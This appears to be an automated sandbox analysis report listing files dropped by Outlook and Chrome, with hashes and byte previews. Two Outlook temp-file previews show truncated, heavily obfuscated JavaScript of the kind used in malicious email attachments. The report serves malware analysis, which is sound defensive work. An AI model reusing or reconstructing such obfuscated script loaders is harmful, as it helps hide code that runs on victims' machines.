              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241010T0328520416-5152.etl

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:modified
              Size (bytes):106496
              Entropy (8bit):4.532409908573557
              Encrypted:false
              SSDEEP:
              MD5:6B8E70EA7325C95D4C8BDDF6A71E1683
              SHA1:2F6B96C02832D772D15140523711594454508872
              SHA-256:B6D37AE4FEF9D8C2631F0BD3D835A4EFAA69C6E1CF213D6442D83D0CA1660D18
              SHA-512:39C38426E24EFFF6EED3D84DDA3559724A127B14418BEC67826732DFD238C41538515EF98C26C42E719D0E7A0C897241B65616C869605C5EF6100C0C4E6F65F3
              Malicious:false
              Reputation:unknown
              Preview:............................................................................`....... .....i.....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................p/..Y............i.............v.2._.O.U.T.L.O.O.K.:.1.4.2.0.:.5.c.6.0.5.b.3.0.6.1.2.2.4.1.b.5.b.b.0.0.0.6.9.e.3.2.7.d.b.3.0.4...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.1.0.T.0.3.2.8.5.2.0.4.1.6.-.5.1.5.2...e.t.l.......P.P..... ...K"l.............................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\olk986E.tmp

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):401160
              Entropy (8bit):5.0969337234259475
              Encrypted:false
              SSDEEP:
              MD5:6809BA3651266F40B1AF131747303287
              SHA1:83E1BDAF42FB231C88145990238DAB39C9072014
              SHA-256:9003F9E4D3E0CA4942B9388ECABD1CF1AAD9F02034EB09751BE50E05ACD93CF6
              SHA-512:83B829203170077ADF67B717C63281C1E071ABDB70CB73D3F8946018A2B472EB35536A7B8DE87FFD404CFBD7C99FADC5330B3708354682C5CDAB81AEEEDD6663
              Malicious:false
              Reputation:unknown
              Preview:JScrJzUnKyc3JysnIicrJyknKSgpK1tdW2VdW3RdKHkrJCtzZytfK3krZCsnICcrXytk..KyQrc3MrYStzYSsoMjUpW3NdKDMwKSskKycoJysnIicrJyUnKyc1JysnNScrJyInKycpJykoKSso..KFtdK1tdKVt0XStbXSlbMTRdK1tdW2VdW3RdKHkrJCtzZytfK3krZCsnICcrXytkKyQrc3MrYStz..YSsoMjUpW3NdKDMwKSskKycoJysnIicrJyUnKyc1JysnMCcrJyInKycpJykoKSsoKFtdK1tdKVt0..XStbXSlbOV0rKCghW10pW3RdK1tdKVs5XStfK1tdW2VdW3RdKHkrJCtzZytfK3krZCsnICcrXytk..KyQrc3MrYStzYSsoMjUpW3NdKDMwKSskKycoJysnIicrJyUnKyc1JysnOScrJyInKycpJykoKStb..XVtlXVt0XSh5KyQrc2crXyt5K2QrJyAnK18rZCskK3NzK2Erc2ErKDI1KVtzXSgzMCkrJCsnKCcr..JyInKyclJysnNScrJzcnKyciJysnKScpKCkrJzEnK2crW11bZV1bdF0oeSskK3NnK18reStkKycg..JytfK2QrJCtzcythK3NhKygyNSlbc10oMzApKyQrJygnKyciJysnJScrJzQnK2ErJyInKycpJyko..KStkK1tdW2VdW3RdKHkrJCtzZytfK3krZCsnICcrXytkKyQrc3MrYStzYSsoMjUpW3NdKDMwKSsk..KycoJysnIicrJyUnKyc0JytzYSsnIicrJyknKSgpK2crYStbXVtlXVt0XSh5KyQrc2crXyt5K2Qr..JyAnK18rZCskK3NzK2Erc2ErKDI1KVtzXSgzMCkrJCsnKCcrJyInKyclJysnNCcrJzcnKyciJysn..KScpKCkrKDMzKVtzXSgzNCkrKDE3KVtzXSgyMCkrW11bZV1bdF0oeSskK3NnK18reStkKycg

              C:\Users\user\AppData\Local\Temp\olk987F.tmp

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):235447
              Entropy (8bit):3.85868895765524
              Encrypted:false
              SSDEEP:
              MD5:166C7C3FFB0D9AE1B2A51B545182024E
              SHA1:2E70DD44902AC09F2AB7DFD9D16508AA9D2A18EB
              SHA-256:D8AD92EDA7891D368F9968EEDEEC90E5B030E6672276FF763AF745D9B8DF7450
              SHA-512:4F56DF4EC54103F02DCCFFD28202CFD23D940F9B743A68471FEDE1A12E001B183E70FA700601E360FEDA36664A132ADC5E420B657D9F2D40F4B3DC612B4FB1F2
              Malicious:false
              Reputation:unknown
              Preview:$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'1'+'"'+')')()+(([]+[])[t]+[])[14]+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'9'+'"'+')')()+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'7'+'"'+')')()+'5'+(20)[s](21)+si+'3'+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'6'+'"'+')')()+(25)[s](30)+si+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'4'+'7'+'"'+')')()+(33)[s](34)+g+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'4'+a+'"'+')')()+sn+((![])[t]+[])[9]+sd+st+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'7'+'"'+')')()+(33)[s](34)+ss+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'9'+'"'+')')()+(([]+[])[t]+[])[9]+((![])[t]+[])[9]+(32)[s](33)+si+'3'+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'4'+sa+'"'+')')()+s$+sa+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'4'+'7'+'"'+')')()+[][e][t](

              C:\Users\user\AppData\Local\Temp\~DF07FDEB0F92AC1124.TMP

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):512
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:BF619EAC0CDF3F68D496EA9344137E8B
              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
              Malicious:false
              Reputation:unknown
              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\~DF4EAA55C3EA4B3ECE.TMP

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):606208
              Entropy (8bit):3.7538263360901607
              Encrypted:false
              SSDEEP:
              MD5:C7D7C7C8B38C958FD7B88A7272BB6404
              SHA1:7948999BC376C836D1783848C7598D98DB55E086
              SHA-256:33F8263A6D4B1AFC5092E0053053C98A6BB57251EE488C9B48E1A3F2A3649062
              SHA-512:7F8E656310ECAD1AFFA132BBC6C26BD20B019E0D72E3A315C759981204D4AF8EE47A8C15DC73703E8ADE5E55F50D0E59C73F01FD50D868033DE27D9ED43EF244
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\~DF8D57524B9BAA8A68.TMP

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:CDFV2 Microsoft Outlook Message
              Category:dropped
              Size (bytes):458752
              Entropy (8bit):4.3715704496489565
              Encrypted:false
              SSDEEP:
              MD5:8C1C39B66C7DDB95DF7FC4464D02631D
              SHA1:01E378A93D344983E4DBDB3CBF25054177EC1C9E
              SHA-256:4F833E18CD4F2DCD9EFA6D4155321F9B4F9889770073322BF338A5A11EE7BC5B
              SHA-512:DF8685ED8D50CD6D6448B4B34E93CCE0AE05F10A8AE78F840D1F828E4B460EFA8C71751D65C92AD497F61E838AF72BEFF1FEE67B1BF215150B19388B5AF306F9
              Malicious:false
              Reputation:unknown
              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................^..........@......._._.p.r.o.p.e.r.t.i.e.s._.v.e.r.s.i.o.n.1...0...................0..............................................................._._.n.a.m.e.i.d._.v.e.r.s.i.o.n.1...0...........................(...........,................................^.................._._.s.u.b.s.t.g.1...0._.0.E.0.4.0.0.1.F.........................*.......................................

              C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:modified
              Size (bytes):30
              Entropy (8bit):1.2389205950315936
              Encrypted:false
              SSDEEP:
              MD5:E58F1317756DA0FDC1DF836F59BCE5ED
              SHA1:6003B2D80F7AE7CA187B21F7362457774C53A3E7
              SHA-256:4B1326015149FD1E48ED64281054BEFD89259C411DD0695ED6D035B320E2BD05
              SHA-512:FB16BF7EF7C38C9BDBEAB423C3A376D6075853AC2798B45EED16BD14A65612171A11D164A33317F41CC4EF3B6211BE8C85BECA7610B951957E14C16285AE84E3
              Malicious:false
              Reputation:unknown
              Preview:..............................

              C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):16384
              Entropy (8bit):0.6689880738799913
              Encrypted:false
              SSDEEP:
              MD5:FA0C42CAAEA98B5491EB769E055D27D4
              SHA1:F1DEB7ADC1D5FED51E454E0C312B056B55A04850
              SHA-256:4C334C5F52838A0F78F2C45602EFA3B4FAC62DD7D400A1A44DAE5E9B2D3A45FA
              SHA-512:4571460D757EB55807BED2102451A4C53D7C297C308125810B64099B20F2BB4FB5568F9F59DB5556696A71DF9521DC9CE7853A404EB6016F1EC4C0E10F3C7ED8
              Malicious:false
              Reputation:unknown
              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2673
              Entropy (8bit):3.9845052455742715
              Encrypted:false
              SSDEEP:
              MD5:ADE76CC9B1C72456E2EE7B147C270F2C
              SHA1:432153BDD4D0FC6C9DA292A2B9B7750114FF6042
              SHA-256:4E3B8C57C094CBDE6A38DB0A2C22ED9CCD77FDFF8386771936731E70B0DB4C38
              SHA-512:CBE2F851A18140CE2A6EB43337EF9B6E68B0B270E466CC5D6FFEED7E6DE3EB50D9EA5C7F1C39E2587945D72860723925A002BF7CFA3B540BA59E75D530ED2132
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....m......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VJY.;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2675
              Entropy (8bit):3.9991657139099104
              Encrypted:false
              SSDEEP:
              MD5:05982F42512618DA0843987D58CD576A
              SHA1:220A3E5A5BCAEBC1F88CB460357DFCEA0EE894D0
              SHA-256:0E333FAF75BEEFAD7495E8F3CE3047A2308D41F6A7EE21B039E17F1E517DF759
              SHA-512:A1BA36A2953FFAA23AEC9F444281FD3CAFC5A487AAD6D18E8CDF13EE6038955CABBB8DF40F75AD779470B237E7F37E5181D141E62A913E8C1419831987CB0C36
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....^c......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VJY.;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2689
              Entropy (8bit):4.00613585977403
              Encrypted:false
              SSDEEP:
              MD5:0B578EEED3FC4447A9F54E21810D6C43
              SHA1:EB95C99DE939DAC67BDCDE96DF71E5323DD84CC8
              SHA-256:9137974091B1DF1B24840D7C6CA07BBE3CABA07097FE2A0E9B1D15AACB204EF8
              SHA-512:FEBED5A48C88DE239E054ADB0E7C14329F2BBD8C6F03DCD23B2A7BE51B5E6D042073810F6A1D5F0C18F28EBE72158D8BCC8350C87BDB3ACC8180DC891F35113D
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2677
              Entropy (8bit):3.9995546900910623
              Encrypted:false
              SSDEEP:
              MD5:349A280E2D47DD725808047D4E34285F
              SHA1:05DBCDA785A0BD53AD9FA62D984923AADBA8F9BD
              SHA-256:31A3F7BDF5F7CA95487A33E49485C949379CA0B2A8CAF4B0AE891C82E45EB281
              SHA-512:0493817990BF7B9BC76EC7C0D4CA93AE933A9D1475465012145CE6F88C2B83B1DBFAF1DD37EEADE282416B98745F1A8E93549A59C7FECFFD8AF2376BFE3F753C
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VJY.;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2677
              Entropy (8bit):3.9870569302285204
              Encrypted:false
              SSDEEP:
              MD5:2BAB5DA228CF288654AD684B9A91FF70
              SHA1:091341C2B17A9B3DB2E1FF6BC553F109C4E70A52
              SHA-256:1991E4EE10523925BF8AF064869169D84A95B545BECEEA472C924DAA39B7CE81
              SHA-512:B7709FA31DE53716F5A7C6BAD1BC667A9949404C753FEC4DD09D7F1C34DBDE58FC15483B2498075CE670FE1BF7FFFD3C9C9D849C425B4242EAECA1CC2E701A16
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....W.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VJY.;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2679
              Entropy (8bit):3.9978057077399334
              Encrypted:false
              SSDEEP:
              MD5:C4DB6D8250E83786F81CAE58F9382B88
              SHA1:CEB2CF27B43EA75F1289A7CF83455F8A6728D725
              SHA-256:ED60CAE37390920A7B67183D11076015798819F9F5AE97C0B43DA98FED4C8C2C
              SHA-512:C2CB40357DADF115AC8CBBB0DFEC0A116AB02270D3663DF1236BB3322A44AE8096DDEA8AA350AF230B8C030B87A298C2FEC3A26DF4C7D8DBF0D191BC21356492
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VJY.;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

              C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:Microsoft Outlook email folder (>=2003)
              Category:dropped
              Size (bytes):2302976
              Entropy (8bit):1.9081867131175085
              Encrypted:false
              SSDEEP:
              MD5:6896CF53A24D5F13A3D540307930C147
              SHA1:6FC9FD1AE001F3CD1AA28F478A099223C62FD967
              SHA-256:6875FF8A636CF90351D2729C8D1F9010FF8A646FA1D16A453E03148304116588
              SHA-512:7874E2C483C1F470DF1E29DCB33892772645222E40117CADC92FF5DF51B2CB4526D6037A8537740EEBE7704BAB8EF3EB8A7C771A0A0B4B177886C7E80373B018
              Malicious:false
              Reputation:unknown
              Preview:!BDN....SM......\..............`.......g................@...........@...@...................................@...........................................................................$#......D......@...............P...............^...........................................................................................................................................................................................................................................................................................l..........-.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):524288
              Entropy (8bit):4.729864841025142
              Encrypted:false
              SSDEEP:
              MD5:39D7BE7711B524507E05CE1B791110CB
              SHA1:31DCC28035074999B7590F36B3BCB9AD76EC8363
              SHA-256:5AC853B058D9C52BEB6281471356A6CCD066F4F64B6B8928728A0025EE2F31EE
              SHA-512:BACC176993D93C6C616DE816F7913070C3B894E9444561E09D85A8EE1F659C8AFB9F3AE17F70DCFB077BD12126C89041C6B4A2F0009D8E59E95AC6AD99BC26D3
              Malicious:false
              Reputation:unknown
              Preview:&...0........... .....D..........B............#.......................................0...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................`GA...`........8..C........... .....D.......................#.!BDN....SM......\..............`.......g................@...........@...@...................................@...........................................................................$#......D......@...............P...............^...............................................................................................................................................................

              Chrome Cache Entry: 80

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (32012)
              Category:dropped
              Size (bytes):69597
              Entropy (8bit):5.369216080582935
              Encrypted:false
              SSDEEP:
              MD5:5F48FC77CAC90C4778FA24EC9C57F37D
              SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
              SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
              SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
              Malicious:false
              Reputation:unknown
              Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e

              Chrome Cache Entry: 82

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
              Category:dropped
              Size (bytes):17174
              Entropy (8bit):2.9129715116732746
              Encrypted:false
              SSDEEP:
              MD5:12E3DAC858061D088023B2BD48E2FA96
              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
              Malicious:false
              Reputation:unknown
